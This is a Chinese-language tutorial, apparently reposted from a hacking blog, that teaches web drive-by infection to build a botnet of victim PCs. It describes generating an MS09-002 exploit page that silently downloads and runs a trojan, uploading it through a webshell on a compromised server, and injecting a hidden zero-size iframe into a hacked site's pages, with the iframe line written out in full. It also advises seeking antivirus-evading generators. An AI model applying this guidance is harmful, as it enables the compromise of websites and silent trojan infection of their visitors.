【揭示网页挂马技术的秘密(转网络安全)】
【揭示网页挂马技术的秘密(转网络安全)】
首先说什么是网马,网马有什么用呢?例如,大家想玩鸽子,想找肉鸡。想找很多很多的肉鸡。当然方法很多,例如135抓鸡什么的。但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了,再者,天天有人扫肉鸡。当然肉鸡就少了,也很难找到。还有,大家扫描肉鸡的方法可能也有点不对。综合起来,利用这些漏洞找肉鸡的效率很低下。那么用网马呢,网马就是挂马。你想下。要是一个网站,一天有1万个人访问,一万个人中哪怕几率降低到%1的中马率。一天也有100个人中马成为你的肉鸡啊。而且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。所以网马很爽,所以也比自己拿个软件扫描漏洞来劲。
上面说了网马的作用。综合叙述下,就是快捷,方便。更快,更高,更强的达到散播木马的途径。然后,大家应该明什么是网马了吧?对的,网马简单的说下,就是网页木马。当别人访问一个网页就可能从这个网页自动下载木马,并且在你后台悄悄运行。这就是网马。简单的这么理解,当然我们学黑客知识的肯定对这些东西不能简单理解了事了。但是,我们只是入门的小菜鸟,所以再深入了解一点点就行了。
深入说下。什么是网马?网马就是利用网页代码操作win的漏洞。首先,我们得明白什么是网页。为什么我们打开一个网站,这个网站会显示出这些图片。就如你现在看的这篇帖子,为什么背景是这个颜色,为什么字体有大有小,为什么网页各处的颜色不同。然后构成了这样一个网页。怎么构成的?难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面?错了。是图片+文字+代码。这是一个网页构成的基本元素。但是,代码是必须要的。这里提到了代码。例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。这些设计,规划,就是代码来操作的。当设计者把网页代码编写好了。然后放在服务器上(一般来说是IIS服务器。IIS简单的说下,就是网页服务器。)进行服务器的解析。然后当你访问这个网站。那么就得到了你现在所看到的网页了。这里提到了代码。是的。不光服务器要分析代码。你的电脑也要解析分析代码。你的电脑分析了代码才能显示出这样的页面。所以大家可以在网页空白处,右键单击查看源文件就会看到代码了。萝卜家园系统下载当然,这个只是你单方面的代码,核心代码还是在服务器上。你这样看到的只是显示的页面解析的静态的页面代码。也就是说是HTM的代码。所以,你在浏览器上点,文件——另存为保存网页的时候都是HTM格式!
上面说到了代码。下面说下漏洞。WIN这个操作系统有很多漏洞。我相信大家都知道,清楚。例如:MS06-04O这样的ms开头的漏洞名字。这些漏洞是怎么形成的呢。就是代码操作形成的。有些朋友就问了,代码怎么会出现漏洞呢。一时半会讲不清楚。举例吧,简单通俗的例子。例如x=取文本y=取X前三个数字这么一段代码。如果实际操作的时候,这个文本如果取出来时1234567那么X就等于1234567那么Y取的是X文本前三个数字那么Y就等于123.这么一段代码看是没问题。但是如果取不到文本呢。或者取到的文本数字就1个呢?比如X=1就一个数字。那么Y怎么取出前三个数字呢?遇到特殊情况,那么就有可能造成代码出错。当然,我这里是举例,为了大家简单,就用最最最通俗的例子给大家举例。具体代码不可能这么乱七八糟的。如果我们这段代码加个判断。如果X取到的数字小于3.那么Y就不取前三个数字,或者 Y就等于0.那么是不是什么事情都没了呢?但是,程序员一不小心,没注意,或者没看到这个代码的弊端。那么就有可能造成代码出错。造成了漏洞。以小画大,那么WIN的操作漏洞大多数也是类似的。由于程序代码的问题。被黑客发现了。那么就利用这段代码的漏洞,构造成别有用心的代码造成对电脑的破坏。当然,不局限于WIN系统。也可以是例如迅雷,暴风影音照样的第三方软件!
口水很多。也不知道大家听懂了没有。我们来结合下。上面说到了访问网页其实就是根据网页,然后本地执行代码。然后显示在我们的电脑网页上面。WIN的漏洞就是代码漏洞。黑客编造一段利用这个代码的漏洞可以进行入侵。聪明的朋友应该想到了。访问网页要执行一些代码,win的漏洞要被利用需要执行一些特殊代码!所以。网马就是构造一段特殊的代码,当你电脑访问了执行了这段代码,正好你的电脑上有被这段代码利用的漏洞。那么!恭喜你,你就中网马了。
网马就是这样形成的。所以,有些黑客很牛B的说。我就算是把我的管理员账号密码告诉你。你也入侵不了我的电脑。就如,你把你的网马发给我。我访问了。我照样没事。为啥,我电脑没漏洞,你怎么利用!呵呵,我想大家能理解了吧。
当然,我们小菜鸟深入到这步了解就差不多了。如何找漏洞。如何找到漏洞构造此漏洞的代码编写。这就是黑客们的事情了。我们还没这个能力。下面说下网马制作。上文提到了,网马就是一段网页代码。当然,我们不懂这些代码如何编写。我们还是用别人的工具吧。网上也有很多网马生成工具。我随便找了一款。大家也可以自行去网上搜索寻找。
首先,我们打开软件,我们可以看到。上面有很多ms这样开头选项。这就是WIN的系统漏洞利用。当然我们看到了有暴风,联众,等这样的。这就是第三方软件漏洞的利用了。这里,注意上面有个下载地址。什么是下载地址呢。就是我们木马的下载地址。我们把木马上传到网站上。然后获取到木马的下载地址。当然了。别人直接访问你的这个下载地址。系统会提示你是否下载的提示不说,别人不运行。木马就运行不了。所以这里要结合上网页代码。构造成一个网马。我本地做实验。就不上传木马了。假如,它上面填写的就是我的木马下载地址吧。我点ms9002.看到了吗?都是代码。网页代码!092.htm的代码意思是运行同目录下的ms09002.js.ms09002.js的大概意思是。利用ms09002的漏洞,自动下载我们上面指定的那个网址的木马后,自动运行。当然ms09002的代码是加密了的。我们也看不大实在!
那么这两个文件就是我们的网马文件了。我们只需要把这两个文件上传到我们网站上。别人访问了这个网页,如果有ms09002这个漏洞,就可能中马!我们来上传吧。我用我的一个webshell给大家演示下吧。网马我就上传到我的webshell目录下!网马生成器,生成了两个文件,就上传两个。生成了一个,就上传一个。
那么我们的网马地址在哪儿呢?我们的上传地址是:C:\inetpub\wwwroot\EasySite\Portals\95\cpzs \这个目录下。那么我们要访问的目录地址就是EasySite\Portals\95\cpzs\+网马名字我们网马是由092.htm调用运行同目录下的ms09002.js那么网马名字就是092.htm.那么访问地址就是http://www.******.com/EasySite /Portals/95/cpzs/092.htm到此。我们的网马就做好了。我们的ms09002漏洞网马地址就是http: //www.******.com/EasySite/Portals/95/cpzs/092.htm发给有此漏洞的朋友。win7旗舰版系统下载如果他们电脑没网马拦截软件,或者没其他防御手段。那么极有可能中马!
这里又说下。构成网马的代码很多种。当然,网上免费的,分两种。一种是黑客炫耀技术,故意放出来的。第二种,商业黑客,写的免费的给大家试用。对于这样公布了的网马生成器。有几个坏处。第一,中马效率低下。意思是说,有可能别人访问了你的网站根本不会中马。第二,容易被杀毒软件拦截。这个大家都清楚吧!第三,容易当别人的工具。可能免费的。里面的代码加入了工具制作者的网马。你挂上了网马,别人种了你的网马,也可能中了此工具制作者的网马!这就是导致很多朋友做的网马失效的原因!所以,对于网马生成器。大家可以耐心的去网上找找。肯定会找到一个中马率高,免杀的免费的。只不过需要花费大量的时间和精力去搜索然后测试。当然,有经济的朋友可以购买商业黑客的网马生成器。一般来说很不错的。如果购买请注意网络骗子!
上面几大段谈了什么是网马用途,什么是网马,如何制作网马。下面我说说怎么挂马吧!
挂马什么意思?出现这个概念的时候是基于网马之上的。我网马做出来了。不可能每个群,每个人去宣传我的网马地址吧。现在的人也聪明。一般的网址不点的。所以这里要用到挂马了。把这个网址附加到正常的网页上。当网友访问了正常的网页,也就不知不觉的中了你的网马了。
用到的代码:[iframe xsrc="你的网马地址" name="lcx" width="0" height="0" frameborder="0"][/iframe]这句代码一般加在网页的末尾。例如我入侵了一个网站。我要在他的网站上挂马。例如在http: //****/EasySite/Portals/95/cpzs/image.asp这个页面上挂马。那么,我们进入webshell找到 image.asp这个页面。把:[iframe xsrc="你的网马地址"name="lcx"width="0" height="0" frameborder="0"][/iframe]这代码加入进去。上面网马做好了。那么就加入:[iframe xsrc="http://www.******.com/EasySite/Portals/95/cpzs/092.htm" name="lcx" width="0" height="0" frameborder="0"][/iframe]保存后。那么我们挂马就成功了。那么别人一访问http://****/EasySite /Portals/95/cpzs/image.asp这个正常页面。那么就会不知不觉也访问了你的网马网页,就会中了你的网马了。
当然,如果你要挂在首页就在首页的文件里面加入代码。你如果要在整个网站的每个页面都挂马。那么每个页面都可以加入此代码。这就是挂马。
【揭示网页挂马技术的秘密(转网络安全)】相关推荐
- Web安全-检测-网页挂马
网马 网马的本质是一个特定的网页,这个网页包含了攻击者精心构造的恶意代码,这些恶意代码通过利用浏览器(包括控件.插件)的漏洞,加载并执行攻击者指定的恶意软件(通常是木马). 网站挂马是黑客植入木马的一 ...
- 金山毒霸四月安全趋势 继续关注网页挂马
根据三月所观察与收集到的数据,金山毒霸反病毒工程师对4月份的安全形式做出以下估计与提示: 提防木马下载器的再度爆发 整个3月份,病毒团伙的精力都放在制造网页挂马上,猫癣.死牛等传统的木马下载器几乎停止 ...
- 解析网页后门与网页挂马原理
网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的.Web服务器被攻克不算,还"城门失火殃及池鱼",网站的浏览者也不能幸免.这无论是对企业的信誉,还是对管理员的技术能力都是沉 ...
- 网页挂马防护市场探索
据调查表明百分之九十以上的病毒传播途径都是以网页***为主,其实网页***就是将***和网页结合在一起,打开网页的同时也会运行***.最初的网页***原理是利用IE 浏览器的ActiveX控件,运行网 ...
- Linux 网页挂马实验,网页挂马详细教程
网页挂马详细教程 网页挂马详细教程 其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了.. 下面我介绍5种方法 ...
- 网页挂码方式html css,CSS代码 解决网页挂马问题
CSS代码 解决网页挂马问题 发布时间:2009-10-01 02:13:24 作者:佚名 我要评论 两行CSS来解决网页挂马问题,共5种方案. 两行CSS来解决,共5种方案 一. ifram ...
- 瑞星4月2日安全综述:网页挂马攻击严重
4月2日安全综述: 据瑞星"云安全"系统统计,4月2日共有2,501,573人次的网民遭到网页挂马攻击,瑞星共截获了794,761个挂马网址,比昨日多出5万挂马网址. 当日被挂马网 ...
- 网页挂马的原理和实现方式
网页挂马 一.网页挂马介绍 (1).挂马与网马
- 网络攻防之dns劫持与网页挂马(实测)
dns劫持与网页挂马 前提工作 --搭建CS(CobaltStrike) CobaltStrike简介 CobaltStrike是一款内网渗透测试神器,常被业界人称为CS. Cobalt Strike ...
- 如何预防和检测网页挂马?
在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的种类.如何检测网页是否被挂马.如何清除网页 ...
最新文章
- K-Means聚类算法原理
- IT行业热点商业模式随笔第七章——商业模式创新规律
- Python 爬虫 大量数据清洗 ---- sql语句优化
- html 执行外部js的函数,javascript – Chrome扩展程序:加载并执行外部脚本
- python调试和测试有什么区别和联系_软件测试和测试开发到底有什么区别跟联系?...
- mysql range代表什么意思_MySQL数据表range分区例子
- 循环序列模型 —— 1.11 双向神经网络
- 计算机学情分析万能模板,信息技术的教学计划以及学情分析
- html5canvas绘制图片源码,HTML5 CANVAS:绘制图片
- flume流程之taildir-memory-hdfs
- flutter弹框怎么封装_Flutter初始化时 弹出弹出框
- 新能源充电桩后台管理系统平台
- 远程迅雷linux,Ubuntu 14.04安装迅雷Xware过程笔记
- 图书租赁管理系统 图书馆借书还书 计算机毕设项目
- Bevy 游戏引擎开发指南
- 未root的情况下获取墨墨背单词的databases文件夹
- 数据结构之图的基本介绍
- MCU远程升级方案,可解决升级错误死机问题
- 微信无法连接服务器1-500,GIF表情超过500kb无法添加到微信的解决方法
- 基于html+css的内容旋转